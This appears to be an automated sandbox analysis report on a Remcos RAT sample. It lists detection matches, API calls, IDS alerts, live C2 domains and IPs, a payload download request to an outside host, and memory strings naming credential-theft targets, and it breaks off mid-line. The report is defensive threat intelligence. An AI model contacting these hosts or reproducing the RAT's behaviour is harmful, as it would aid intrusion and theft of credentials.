              Source: asXlZG3aW6.exeReversingLabs: Detection: 55%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,131_2_00404423
              Source: asXlZG3aW6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 102.65.21.26:443 -> 192.168.11.20:49735 version: TLS 1.2
              Source: asXlZG3aW6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_00406268 FindFirstFileA,FindClose,0_2_00406268
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040572D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_00406268 FindFirstFileA,FindClose,130_2_00406268
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,130_2_0040572D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_004026F8 LdrInitializeThunk,FindFirstFileA,130_2_004026F8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,130_2_367B10F1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B6580 FindFirstFileExA,130_2_367B6580
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0040AE51 FindFirstFileW,FindNextFileW,131_2_0040AE51
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,132_2_00407EF8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,133_2_00407898
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49739 -> 41.216.188.178:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49736 -> 41.216.188.178:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49738 -> 41.216.188.178:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49737 -> 41.216.188.178:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: newfarmn.pro
              Source: global trafficTCP traffic: 192.168.11.20:49736 -> 41.216.188.178:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49740 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49735 -> 102.65.21.26:443
              Source: global trafficHTTP traffic detected: GET /EsbmqCxkb162.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: telesavers.co.zaCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /EsbmqCxkb162.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: telesavers.co.zaCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: asXlZG3aW6.exe, 00000083.00000003.21822346966.0000000002278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
              Source: asXlZG3aW6.exe, 00000083.00000003.21822346966.0000000002278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
              Source: asXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: asXlZG3aW6.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: asXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.facebook.com (Facebook)
              Source: asXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.yahoo.com (Yahoo)
              Source: asXlZG3aW6.exe, 00000083.00000003.21822914001.0000000002A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prom
              Source: asXlZG3aW6.exe, 00000083.00000003.21822914001.0000000002A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prom
              Source: asXlZG3aW6.exe, 00000082.00000002.26279946658.0000000035E20000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: asXlZG3aW6.exe, 00000082.00000002.26279946658.0000000035E20000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: telesavers.co.za
              Source: global trafficDNS traffic detected: DNS query: newfarmn.pro
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://c.pki.goog/r/r1.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://c.pki.goog/wr2/9UVbN0w5E6Y.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.000000000522B000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21776966540.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary 